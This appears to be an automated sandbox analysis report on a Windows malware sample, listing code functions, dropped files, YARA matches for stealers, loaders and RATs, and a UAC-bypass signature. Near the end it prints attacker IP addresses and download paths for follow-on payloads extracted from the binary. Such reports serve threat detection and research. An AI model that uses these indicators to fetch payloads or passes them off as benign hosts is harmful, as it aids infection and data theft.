Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCBD960	2_2_6BCBD960
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BD4F900	2_2_6BD4F900
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCB5920	2_2_6BCB5920
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC9F8C0	2_2_6BC9F8C0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC0D8E0	2_2_6BC0D8E0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC338E0	2_2_6BC338E0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BD5B8F0	2_2_6BD5B8F0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCDF8F0	2_2_6BCDF8F0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCD3840	2_2_6BCD3840
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC5D810	2_2_6BC5D810
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BD1DFC0	2_2_6BD1DFC0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BD83FC0	2_2_6BD83FC0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCABFF0	2_2_6BCABFF0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC21F90	2_2_6BC21F90
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BBF5F30	2_2_6BBF5F30
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC35F20	2_2_6BC35F20
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BD57F20	2_2_6BD57F20
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC23EC0	2_2_6BC23EC0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BD5BE70	2_2_6BD5BE70
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BD85E60	2_2_6BD85E60
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BD0DE10	2_2_6BD0DE10
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCD1DC0	2_2_6BCD1DC0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BBF3D80	2_2_6BBF3D80
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BD49D90	2_2_6BD49D90
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: 3_2_0020F840	3_2_0020F840
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: 3_2_001F4060	3_2_001F4060
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: 3_2_00216130	3_2_00216130
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: 3_2_001F2120	3_2_001F2120
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: 3_2_0020B150	3_2_0020B150
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: 3_2_00249A00	3_2_00249A00
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: 3_2_0023CAA0	3_2_0023CAA0
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: 3_2_00204390	3_2_00204390
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: 3_2_00210390	3_2_00210390
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: 3_2_0021FC10	3_2_0021FC10
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: 3_2_001FD570	3_2_001FD570
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: 3_2_00245550	3_2_00245550
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: 3_2_002496E0	3_2_002496E0
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: 3_2_002166F0	3_2_002166F0
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: 3_2_001FA6F0	3_2_001FA6F0
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: 3_2_001F37B0	3_2_001F37B0
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: 3_2_6C804D8F	3_2_6C804D8F
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: 3_2_6C803D16	3_2_6C803D16
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: 3_2_6C81371C	3_2_6C81371C
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: 3_2_6C77D24D	3_2_6C77D24D

Dropped file seen in connection with other malware

Source: Joe Sandbox View	Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View	Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: String function: 6BD8DAE0 appears 67 times
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: String function: 6BC5C5E0 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: String function: 6BD809D0 appears 282 times
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: String function: 6BC23620 appears 88 times
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: String function: 6BC29B10 appears 76 times
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: String function: 004043B0 appears 316 times
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: String function: 6BD39F30 appears 50 times
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: String function: 6BD8D930 appears 54 times
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: String function: 036736F8 appears 184 times
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: String function: 03697A73 appears 43 times
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: String function: 03679F27 appears 48 times
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: String function: 03671D46 appears 44 times
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: String function: 00409CC0 appears 48 times
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: String function: 0042780C appears 43 times
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: String function: 03671BE3 appears 70 times
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: String function: 001F1900 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: String function: 001F14F0 appears 60 times
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: String function: 001F1310 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: String function: 00379D36 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: String function: 6C804701 appears 76 times
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: String function: 001F1930 appears 76 times
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: String function: 6C806320 appears 31 times

One or more processes crash

Source: C:\Users\user\Desktop\sx8RE6LbG0.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3664 -s 968

Sample file is different than original file name gathered from version info

Source: sx8RE6LbG0.exe, 00000000.00000003.2075830262.0000000003795000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2071578865.00000000037B9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2070408708.0000000003788000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2153198605.0000000001DB4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameL vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2070439016.0000000003799000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004BF8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004BF8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFileName vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004BF8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \OriginalFileName vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2073990551.000000000378B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2094919127.00000000037BA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000002.2423173870.0000000001A1D000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameFirezer0 vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2075245239.0000000003795000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2076626113.00000000037DD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2075390741.000000000379E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2073925424.0000000003782000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2019130046.0000000003701000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameFirezer0 vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2153198605.0000000001D2F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameFirezer0 vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2075093112.0000000003787000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2070109629.0000000003782000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2073613131.00000000037A1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2073192567.0000000003795000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2073415349.000000000379C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2073816464.0000000003780000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000002.2424663925.0000000003749000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameL vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2075627426.0000000003782000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2071977209.00000000037A1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2077142039.00000000037B8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2070164179.000000000379F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2071838564.0000000003795000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004FE4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameL vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe	Binary or memory string: OriginalFilenameFirezer0 vs sx8RE6LbG0.exe

Uses 32bit PE files

Source: sx8RE6LbG0.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 3.2.run.exe.410ed5b.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 4.2.cmd.exe.5b000c8.8.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 24.2.cmd.exe.556c264.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 3.2.run.exe.40ca86d.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 22.2.run.exe.3903d5b.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 24.2.cmd.exe.5b600c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 4.2.cmd.exe.515de64.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 24.2.cmd.exe.5b600c8.7.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 22.2.run.exe.38bf86d.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 28.2.MSBuild.exe.1200000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 4.2.cmd.exe.5119976.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 24.2.cmd.exe.556ce64.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 22.2.run.exe.390315b.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 4.2.cmd.exe.5b000c8.8.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 4.2.cmd.exe.515d264.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 3.2.run.exe.410e15b.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21729406ca8.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 24.2.cmd.exe.5528976.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2171726d525.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2171729432f.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21713f3537d.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21713f54dad.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.217172b8739.8.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21713f447a3.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 00000002.00000002.2530199003.0000000001A44000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.2424325171.0000000003670000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.2424005663.0000000001CE5000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000002.00000002.2530861686.0000000003500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\jipsoiol, type: DROPPED	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: C:\Users\user\AppData\Local\Temp\dvffdl, type: DROPPED	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT

Source: 4.2.cmd.exe.5b000c8.8.raw.unpack, -Module-.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21731ea0000.9.raw.unpack, LHMFCLLKPJPNLPEMOOMPKGFGGJLDMBDEHOHN.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21731ea0000.9.raw.unpack, LHMFCLLKPJPNLPEMOOMPKGFGGJLDMBDEHOHN.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21731ea0000.9.raw.unpack, LHMFCLLKPJPNLPEMOOMPKGFGGJLDMBDEHOHN.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@44/79@10/11

Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe

Code function: 2_2_6BC60300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError,

2_2_6BC60300

Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe

Code function: 3_2_0022D660 GetDiskFreeSpaceExW,std::exception::exception,__CxxThrowException@8,

3_2_0022D660

Source: C:\Users\user\Desktop\sx8RE6LbG0.exe

Code function: 0_2_01CE678E CreateToolhelp32Snapshot,Module32First,

0_2_01CE678E

Source: C:\Users\user\Desktop\sx8RE6LbG0.exe

Code function: 0_2_0042628B CoInitialize,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,SysAllocStringLen,MultiByteToWideChar,MultiByteToWideChar,SysAllocStringLen,MultiByteToWideChar,

0_2_0042628B

Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe

Code function: 3_2_00208040 LoadResource,LockResource,SizeofResource,

3_2_00208040

Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\freebl3[1].dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Mutant created: \Sessions\1\BaseNamedObjects\e7cbbe5f9b9841e6afa735541f989b8a
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Mutant created: \Sessions\1\BaseNamedObjects\Canon_UIW_Inst_v1
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2800:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5256
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3664

Source: C:\Users\user\Desktop\sx8RE6LbG0.exe

File created: C:\Users\user\AppData\Local\Temp\u2ts.0.exe

Jump to behavior

Source: Yara match	File source: 6.0.u2ts.3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000000.2151539522.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2152517615.0000000004BDD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe, type: DROPPED

Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: two	0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: two	0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: two	0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: 185.172.128.90	0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: 185.172.128.90	0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: 185.172.128.90	0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: Installed	0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: Installed	0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: 185.172.128.228	0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: 185.172.128.228	0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: 185.172.128.228	0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: 185.172.128.59	0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: 185.172.128.59	0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: 185.172.128.203	0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: 185.172.128.203	0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: /syncUpd.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: /syncUpd.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: /timeSync.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: /timeSync.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: 185.172.128.203	0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: 185.172.128.59	0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: /timeSync.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: /syncUpd.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: .exe	0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: .exe	0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: /1/Package.zip	0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: /1/Package.zip	0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: /1/Package.zip	0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: .zip	0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: .zip	0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: \run.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: \run.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: 185.172.128.228	0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: 185.172.128.228	0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: /BroomSetup.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: /BroomSetup.exe	0_2_00424A0E
